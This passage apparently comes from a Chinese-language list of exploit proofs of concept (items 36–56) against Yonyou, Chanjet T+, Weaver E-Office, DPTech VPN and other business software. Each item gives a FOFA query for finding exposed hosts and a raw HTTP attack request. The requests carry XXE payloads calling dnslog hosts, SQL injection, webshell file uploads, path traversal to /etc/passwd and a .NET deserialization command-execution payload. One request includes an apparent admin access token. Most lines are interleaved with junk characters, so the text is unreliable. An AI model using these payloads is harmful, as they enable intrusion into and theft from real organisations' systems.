& F- f& n2 ]9 h tHost: 203.25.218.166:88886 y+ ]4 l. o& w1 ^: }- Y
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
. v0 ~ W! T; Z+ ^! Q# zAccept-Encoding: gzip, deflate
2 @% B& Y' U% b* z) l( |3 g. e6 zAccept: */*! Q- }2 B) C% `
Connection: close
8 Z, E- w+ ~* b9 r7 G0 u3 PaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA1 B4 {1 \7 T- h4 Z0 X& @ _8 v5 [
Content-Length: 1905 d7 ]+ I) W' L8 @
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
5 |+ q" O; [& }' F3 @; N; b! t6 [2 v% ]% |" p
--fd28cb44e829ed1c197ec3bc71748df0- E2 e1 x( n; e
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
. F0 F- N) m& v; L, Z" }5 C4 S6 V* E/ G( x- h
<%out.println(1111*1111);%>
' j: x% E/ {9 z" Q3 X0 L8 _--fd28cb44e829ed1c197ec3bc71748df0--
% I7 D: Y! s( ~0 w# X6 d1 z5 F$ L; T* F- R9 @/ G
, d7 ~6 {0 t7 J. v36. 用友NC-Cloud soapFormat XXE- s! ?3 E- G) G$ v4 [
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"# N2 I, ?/ j2 u6 v7 x
POST /uapws/soapFormat.ajax HTTP/1.10 j8 M1 l2 P# b
Host: 192.168.40.130:8989% e0 x w5 l" @. W; }5 `$ A; H5 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0) s" o% _' d' h# R! Y
Content-Length: 263% z7 M9 h6 M& g: ], G( P* s' o$ `0 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# Z9 ]' e: t, g2 d4 E% W$ T) z- EAccept-Encoding: gzip, deflate
: `+ T* K. z2 E! p) AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 {4 W$ h5 [/ F) G# x" C3 ?$ a1 z# _
Connection: close8 Q0 a8 z2 H7 G" r, y/ A+ [; f
Content-Type: application/x-www-form-urlencoded" X, z7 W; D* I! _+ K* F5 E; h5 r' ~# ?
Upgrade-Insecure-Requests: 14 F, a& p: R" W! q! D8 t Q% g0 u
8 M9 r4 f0 E; G) z0 ~% _0 Ymsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a/ U B9 Z7 g ^: A ?
: V7 l6 Q1 B) D1 \0 R7 e8 Z
9 A, b8 o% y6 y/ v# U; F4 ~37. 用友NC-Cloud IUpdateService XXE
/ L! K4 i; C: S# XFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"! \8 b! A6 E) O( {; y4 ^8 F
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
0 {4 v2 D/ _2 yHost: 192.168.40.130:8989
" A+ q! R" y9 I8 }6 Q; VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" A! Q1 G, `% L \8 m% A a+ z
Content-Length: 421# Y) ?0 r; {$ ^8 Q' F6 {! C: l4 b0 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& R- `+ b- g8 r; P& ?Accept-Encoding: gzip, deflate
% N( N1 {5 k, }( Z% b7 ZAccept-Language: zh-CN,zh;q=0.9% T; F* @- w' Z; K
Connection: close
0 m, X4 R; L% C6 C& F T* l; U5 dContent-Type: text/xml;charset=UTF-8
3 v! |- n; h, {/ Y) k/ sSOAPAction: urn:getResult9 v, V/ A" k% v* K" `
Upgrade-Insecure-Requests: 1- b+ }4 L* D3 R. R
' t2 ^ W$ C, r0 g& j, D0 `<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
# C1 e Q5 ~$ @& m, G<soapenv:Header/>
( z/ p+ S3 q' l7 S<soapenv:Body>
/ V/ g1 Q, W- t8 n7 \$ ], R<iup:getResult>
' J1 h& r1 Z: D* Q/ U3 f<!--type: string-->
% w4 Y2 T9 U" ~0 h o% g<iup:string><![CDATA[
! j, d2 d* o. n% }<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
- P# t5 h, ]0 E; g" ~+ Z<xxx/>]]></iup:string>) A6 o: z# ]0 h' ]8 r% j- d- `! m
</iup:getResult>
4 l: _! n* [- K</soapenv:Body>% g0 x6 ~! ?$ { Q' x4 C" N5 B3 Z9 S
</soapenv:Envelope>0 |6 y% W0 c/ z' ~
: m$ N( s6 T: @' G: b! ^
* n$ Q* J% E( H
, a9 I; u- u/ q" G; k8 K38. 用友U8 Cloud smartweb2.RPC.d XXE$ { q7 W3 l) j/ _
FOFA:app="用友-U8-Cloud"
& \/ m2 u( l7 a% n9 V/ L) X$ xPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1) @9 {/ f$ j' T# F/ t" Y
Host: 192.168.40.131:8088" T( I7 _. Y* ]. L7 S* I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25, ~* b) S% \8 n$ t( g$ l$ ^
Content-Length: 260
& s; t0 R# Z1 f0 s2 S! YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
3 V' g! Q6 _9 `" PAccept-Encoding: gzip, deflate
# e% a* }$ h. @8 u: z1 vAccept-Language: zh-CN,zh;q=0.9
4 q3 m2 q T* aConnection: close9 U. D) r1 s# _" J) n. \' I% T( P
Content-Type: application/x-www-form-urlencoded
1 ]# M: S% x6 w6 f& m" g }( a5 j
4 V+ ]- p S$ J( o* Q' p" F__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>- H3 F6 o& T! s2 I
( [( \7 P R# q. D, b7 t
; j: ^2 P0 I6 @ d; j# y39. 用友U8 Cloud RegisterServlet SQL注入
3 f0 u5 U W/ F. WFOFA:title="u8c"
4 v4 G1 ~% @% h- k3 \$ rPOST /servlet/RegisterServlet HTTP/1.1
/ h0 {# ]0 x4 X, P. [& g, f/ bHost: 192.168.86.128:8089
6 m6 g: }; ^1 r. c6 D- v, oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
0 J& }6 J. D( W. f' D4 S" tConnection: close" U: C) g$ R7 k& e
Content-Length: 85
0 | H. i3 h. i5 \5 qAccept: */*
# W- S1 k" v/ Y! {) QAccept-Language: en
7 R- L2 p& X7 g( @8 j0 f7 E; TContent-Type: application/x-www-form-urlencoded2 l: |& p9 ], \9 Y( X8 j; L
X-Forwarded-For: 127.0.0.1
' o' C. |8 i1 n% W* N9 mAccept-Encoding: gzip
- m7 K- K) T9 i5 _% Z% F+ D
9 q9 \, f& O5 q2 m1 t* _usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+ f2 j5 r; ?- M# s
$ [1 |0 W* ^; }7 a* p3 B/ U
% X2 t3 W$ i9 t! [7 S40. 用友U8-Cloud XChangeServlet XXE9 H% a. g- R+ m! U: v
FOFA:app="用友-U8-Cloud"
- @! s3 Z# z% N% I; APOST /service/XChangeServlet HTTP/1.1
9 @$ F# L/ A- E& { ?Host: x.x.x.x
5 j% N) \3 n$ i9 A a7 kUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) `4 o5 k. Q& A9 G
Content-Type: text/xml
% g% C7 y8 E/ K- QConnection: close1 z: q6 Z& P P; Z0 Y8 U! V
4 O0 H1 [ |/ S* w<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
3 M. W1 C' {5 P
+ Y0 u* i1 {& y9 s% h0 }+ d0 l% {, M
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入- \+ z# H' U* z7 Q
FOFA:app="用友-U8-Cloud"
. g ?( W8 T3 V: U8 W; gGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
k; m: w( h+ q6 N6 W" k# bHost:# N6 i! u! t4 `0 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 z4 w( A& L( ~Content-Type: application/json& E5 o- n# l1 k2 z T7 P$ U
Accept-Encoding: gzip
, M8 Z0 Q9 w2 Q) HConnection: close
( h; `% B+ G/ N- {% o
; e! @4 [; t4 E& e6 b8 K0 P; n: u& g7 A
42. 用友GRP-U8 SmartUpload01 文件上传2 e- L5 y6 C5 d3 ~ v) b0 r
FOFA:app="用友-GRP-U8"
; d9 ^& d9 l8 _; s fPOST /u8qx/SmartUpload01.jsp HTTP/1.1
6 h7 N9 u' M& t( _Host: x.x.x.x
" @; M* D6 e% ^( ~: OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
7 L4 b' m$ L! w. c9 I4 g eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
* Q6 q( Y7 l1 a8 T- h: G' p/ x1 A- ~. t- e& J
PAYLOAD
& _) `9 h- N0 ?! m: N& U
" q* y5 g: C( o9 Q8 Q' E& P: ]8 X" O+ B
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml' b& s- {9 x' ~8 v: P2 @7 F
# |0 \: H7 L# L& ^$ q( }
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
$ ?/ ?7 S, G9 U* i0 RFOFA:app="用友-GRP-U8" M9 B1 I2 u0 d1 c2 ~ K) T
POST /services/userInfoWeb HTTP/1.1( A! ?" R# c7 K# \ Z" X' `' T7 ?1 K6 z9 E
Host: your-ip, ` ?: ~0 h. N. A6 Z. u% I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; t7 }- v) u2 E @5 V+ W! K* N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# o' J* x$ n# g; [) j
Accept-Encoding: gzip, deflate# E) O4 i4 n4 ^8 ?* c% R8 I
Accept-Language: zh-CN,zh;q=0.9
( P8 P: V9 A$ S, e" H6 o! l1 j) {! [Connection: close
- A; @3 K' D6 h$ |# y1 R4 W0 nSOAPAction:
) G: O' A% h+ X6 y# r0 VContent-Type: text/xml;charset=UTF-8
+ Q+ H7 Z! ^3 e. C9 Q4 P" y1 A. f- N
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">$ ~& B; G2 ?3 U, e/ \/ f
<soapenv:Header/>0 I' O) W( k, x$ l" ^7 ^
<soapenv:Body>) h$ v9 }2 N9 p/ r$ `
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">4 \ E: X, y( H( U4 z K. x. I
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>2 ?2 m% V$ _6 s
</ser:getUserNameById>
8 F& U; S$ A+ j) M0 n8 c2 T </soapenv:Body>; h4 B: b4 R, m8 J/ A" U
</soapenv:Envelope>
+ K) e* F' X) {( I4 b; J, e* a2 | B( W, W3 i- m5 Z, G
9 C( d1 ~) I$ ^. `5 z44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: X+ c9 d6 m2 l: f m$ b' Y+ kFOFA:app="用友-GRP-U8": b% c: h# D Z0 m6 o2 t4 x+ H
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
6 P, n- }- K* }! T( x8 ]( |Host: your-ip
! C. _- J7 i: b9 x8 W* KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
4 x, l: B# [, u; q9 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: `' I: \; Q e4 ^" X' _' l
Accept-Encoding: gzip, deflate
1 z; {6 l7 x8 C( H; K0 I+ WAccept-Language: zh-CN,zh;q=0.9
4 h6 \) u( o: ^Connection: close: a7 {( u# M! P: r- t8 T# A
& ?% x0 R4 u3 r( M% _
7 S- g: G0 z$ P) Z8 P
45. 用友GRP-U8 ufgovbank XXE
6 {$ y5 q2 X: c V5 WFOFA:app="用友-GRP-U8"
- @* w. Q3 |8 M+ e4 }( C0 yPOST /ufgovbank HTTP/1.18 b" P' P: K8 W/ U
Host: 192.168.40.130:222
' V: {. b0 `* D% \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
( G' r% g6 {5 g- M( C6 dConnection: close8 E/ l% E" s" q
Content-Length: 1618 G* \% w# a. B% z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 }4 Q9 \" [( M! w: B" D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 U- a! I' u, r, Y6 h- m5 sContent-Type: application/x-www-form-urlencoded: I Z, P6 k* {$ c
Accept-Encoding: gzip
& X$ `$ o5 f N; L7 E/ C Y' J- `; L7 R4 c) l/ O/ B' v
reqData=<?xml version="1.0"?>
2 d; @$ K/ D) N& R" o, F<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
6 l3 ]4 Y% o; N, B4 w/ D
; {7 q" Z% F5 T$ Y. L g8 l8 E) d' d' r5 i) U4 W
46. 用友GRP-U8 sqcxIndex.jsp SQL注入+ N8 K1 h+ d; Q- O8 }2 q
FOFA:app="用友-GRP-U8"
+ ? S9 t8 z! z' gGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
, i7 y3 E. n7 p- U, ~Host: your-ip: j5 Q1 `; I7 k" [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
D) z5 c5 n! H7 A+ B- nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' t( p$ W9 P0 C4 E1 c( h w
Accept-Encoding: gzip, deflate
- R! p( d. z' F' W0 V; RAccept-Language: zh-CN,zh;q=0.9. I$ r3 @, \: I1 y- f; `) m4 }
Connection: close
6 n/ [4 H- r2 F! e9 ~( G3 V; G# }7 Z1 O" \
# H0 h% x0 I; _
47. 用友GRP A++Cloud 政府财务云 任意文件读取
9 s% w; G2 u' GFOFA:body="/pf/portal/login/css/fonts/style.css"! L; K7 R4 f, ]8 ^2 ^: i: d
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.10 h2 @- ^2 a" c0 g
Host: x.x.x.x5 |0 z: q9 x; p, k1 @6 A2 l
Cache-Control: max-age=0
8 L/ k, o" ?9 D) r3 |4 T, SUpgrade-Insecure-Requests: 1& _& y3 l) e8 Z3 ^# }. T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: y+ s7 O6 w9 n7 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! u, l3 s7 L0 R3 x8 f
Accept-Encoding: gzip, deflate, br
) r8 N* R/ l" c' P" w" ?Accept-Language: zh-CN,zh;q=0.9
7 Q" p; E- X' ?+ |If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT9 h$ ?5 ?; ?6 ^: N% B. W3 {
Connection: close& \! A. C6 q j: G0 U6 H
$ T" @1 x c. M# e* z: m+ `7 D+ x0 N" C1 y2 e& i6 }
0 ?0 W; Y( J& D1 x) v48. 用友U8 CRM swfupload 任意文件上传
0 o! J) ~1 G# cFOFA:title="用友U8CRM"/ ?+ W9 p1 F( y. c
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
% c' X2 ?& C; F9 ]1 o9 `, SHost: your-ip
) \6 ^ j: g) ]" t6 g* XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' q0 i2 `7 g6 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* E3 i. n/ s M) S* p: yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 T5 }* O. @ P: n$ D5 p( @! yAccept-Encoding: gzip, deflate
! o" L7 l V2 q& E' qContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
( N( K( c+ P; r e------269520967239406871642430066855
$ |/ ^2 J6 D; SContent-Disposition: form-data; name="file"; filename="s.php"
7 d8 N2 F7 m9 L- B" \8 T" Q1231
% B m( V9 Q7 R" ]Content-Type: application/octet-stream
0 O9 W$ ]' {2 }5 @+ i------269520967239406871642430066855# P! I9 J9 E4 Y2 S8 n! q# z
Content-Disposition: form-data; name="upload"
$ L$ V% c% [$ y2 U4 @upload
3 @6 j- Q) E9 l; R+ ]) T/ s------269520967239406871642430066855--" o! ?7 B( n& @8 Y( Z
' u( N4 d8 j) h( g3 B- h3 J/ j4 F+ |- x B
49. 用友U8 CRM系统uploadfile.php接口任意文件上传 |4 p: z" s- _) {4 h, u+ O
FOFA:body="用友U8CRM"
6 }9 y! o# P- Z* J* [( M, ] V: t3 \( W/ \- }: V, |& D, {) J( ^
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
U5 Z. |1 ?; v) mHost: x.x.x.x
1 D1 k2 V; V+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 s* D" T* o+ @! V8 S& MContent-Length: 3290 V$ E: c/ m( x9 k; E. y0 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ o) A! f3 U& w1 N% a5 YAccept-Encoding: gzip, deflate
1 U( E. y% Q9 k2 R7 y! k# FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 E! E- F" W# N# ~- b& T$ b- R
Connection: close5 |: n" k; ], ]; m1 L# W5 L0 `* ~
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
8 [. w/ w9 d' g( B2 }0 i+ y+ J
; o- o. m5 w j+ l8 u: |3 U-----------------------------vvv3wdayqv3yppdxvn3w
) Y* i- n5 K4 Z2 s+ [Content-Disposition: form-data; name="file"; filename="%s.php "! P( ^+ S2 S5 C& p- p; o
Content-Type: application/octet-stream, j) ]1 S" H$ j" I
7 A6 b6 J2 X, `* O$ zwersqqmlumloqa
^+ Y9 H1 S$ N: D( T-----------------------------vvv3wdayqv3yppdxvn3w
2 b+ [" K$ W( j8 u1 W# B1 EContent-Disposition: form-data; name="upload"5 d& q& a+ }5 z
( C1 G7 Z2 c" J. z5 Fupload
9 I" I& v* T1 c7 a9 f8 l* n! a-----------------------------vvv3wdayqv3yppdxvn3w--% o" l, v6 _, s0 f6 ~8 n% U
; p# |3 m# ~4 b
( j$ P+ r. L3 r% c% Xhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
0 x3 K9 `8 U9 h2 w: t) e& V% S K0 [& i1 x5 G
50. QDocs Smart School 6.4.1 filterRecords SQL注入
5 z' l( D; r$ P2 pFOFA:body="close closebtnmodal"" }5 o ?( P% O& u* x7 I$ Z( B5 g* I
POST /course/filterRecords/ HTTP/1.1: m) w3 X$ v# d7 G" q
Host: x.x.x.x
3 S4 W' Q' _4 U: Q5 a! ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# k% C, r0 a! n9 V* pConnection: close$ K8 E6 v O/ E9 b5 x
Content-Length: 224
- T) N# ~( }3 j# g2 WAccept: */* Z( Y- L# J% P* S: g; I
Accept-Language: en
& u! r0 |7 V6 f! GContent-Type: application/x-www-form-urlencoded' X/ _3 N/ k# s% D: q
Accept-Encoding: gzip
9 M( q% Z$ h8 l7 {, a' N: M
`& d6 n+ B! n1 p9 }9 ?- d) usearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
4 K3 K) w8 S' H" N; s' U; A8 U7 g6 u1 D s
* @3 A3 U( A# q51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入. a7 U' n5 R# _. {# g- y" w5 L0 r5 E
FOFA:app="云时空社会化商业ERP系统"
6 H, L% \% T6 B5 p2 GGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.13 k+ Z' e% U5 V9 V# L- V/ Y
Host: your-ip
* ]5 J0 u3 p8 m2 H8 I( v% wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
) o, i: H! o" ?; I, _) VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
4 C8 K; U8 o- ~' ?- eAccept-Encoding: gzip, deflate& o$ R/ z" H4 q4 e
Accept-Language: zh-CN,zh;q=0.9
" w$ b- w4 ]( J/ ^/ sConnection: close" S( T3 G9 m" K& Z
. j! z8 b8 R% f0 {$ h6 M6 v. @, I4 l) {: j9 ~; y- ~' H$ s
52. 泛微E-Office json_common.php sql注入
3 \- D2 [' F, ~2 b! bFOFA:app="泛微-EOffice"; ~6 }" P. w; R/ M
POST /building/json_common.php HTTP/1.1
( g9 x1 U" K# V2 B% S) sHost: 192.168.86.128:8097" w/ q: k/ s, n$ s+ R
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ V' ]8 S' H7 K; y
Connection: close
" o# B3 i, A% H. rContent-Length: 87
1 m% x! G. x5 Y- i, m5 Y& }" uAccept: */*
' n! n* E* D$ X$ R4 @" vAccept-Language: en
4 @$ Q, J$ @, ZContent-Type: application/x-www-form-urlencoded( g" P7 O, A \- U3 B) T9 a$ {' L
Accept-Encoding: gzip: Q5 z4 e* ]3 { W- c; Q
v2 l4 M) r8 G# v5 ~
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
7 C! _, h! r. k# T( z
* E. E. k; ~2 Y2 L- A. Q) ~5 }1 n( N+ a) V8 @) G0 b
53. 迪普 DPTech VPN Service 任意文件上传( k/ N% s- u4 I5 ^7 T4 z* a
FOFA:app="DPtech-SSLVPN"
& ^$ m( R' Y, n+ r9 Q$ B/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd( j' K6 ^7 a" |
: r7 e6 _, e, c( B# a2 B
7 d9 M, `) H7 k$ D1 W. L! ?54. 畅捷通T+ getstorewarehousebystore 远程代码执行
0 H, _$ j3 p% O/ |6 g# F- }0 C- e! zFOFA:app="畅捷通-TPlus" |( Y" b4 Y- p; x. L {0 P
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
3 D; C( a! V$ [* N ~2 f"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt": H: ^. u5 M0 e1 ~4 Y5 v; m3 U
3 w% L% {" \& ]( n7 \
# I: d5 u4 \1 j8 }, q: T( _8 |6 K' {完整数据包
! W) p. `; l$ p! Y& P* kPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
: @5 w+ o7 u2 j* n6 v1 l% YHost: x.x.x.x
5 O+ N2 v$ z6 {User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F/ j6 ^8 n" L! p! H9 Q
Content-Length: 5937 z0 B) }4 O2 J; K. v; J* I/ _
. e' K- u% ^# q: j; K+ r# G
{% q' E& l/ n1 D0 f
"storeID":{; P7 O7 I4 I1 b2 X
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
, C% Y8 n0 _( v- o7 a' m "MethodName":"Start",5 g# o* W, U1 w" O( v
"ObjectInstance":{
8 e* K. O& @, e: @ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 E+ {+ s" _ }* ^! d' D' X% O& t8 T
"StartInfo":{
7 g* {4 M6 m) W" q5 q: _ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
[* Z8 [2 _$ I# N9 N3 G5 U "FileName":"cmd",
], o3 Z; [5 e8 m1 ]6 P6 T "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt" x4 { V$ E# K3 M
}+ Z& v+ X: X# {& _; o4 M# w
}: i5 Z+ [8 d* L, L, C7 l, P
}
8 S8 `: N# M9 P5 }7 ~}1 d0 P2 l4 U% K& [
* v- k$ f, J' T/ P) l2 o! r
+ r+ M/ H6 d- S+ f: I @
第二步,访问如下url6 h8 w; W/ g9 V
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
! i7 _% b, B& m! V7 X' ?2 ^
& w; h, Y, F1 V; g1 @, q) S( N' V1 V( y) c9 `
55. 畅捷通T+ getdecallusers信息泄露
% G; |2 ?! U, X! c) {- C( }FOFA:app="畅捷通-TPlus"$ ]6 W. ~) e* o H% z9 e
第一步,通过7 R- u: P( L+ V" T K8 W6 k
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie) L9 Z: s" ^0 E
第二步,利用获取到的Cookie请求+ j4 ]: ~1 U, n1 m
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers& I: ^* e2 @# W2 X( W k6 i, F
' D, r4 Y0 ~* c @6 V
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
7 O* q8 [4 L. b# MFOFA: app="畅捷通-TPlus". a8 x' L: o3 y# _% H
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1) W9 _7 ^' c6 X; l
Host: x.x.x.x; l, F& {. ]: x4 \5 E. x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36# }$ b5 v6 p/ r6 y
Content-Type: application/json
' i/ g B7 Y. T0 r: c& h
3 V6 h$ M. o4 A( n6 h{
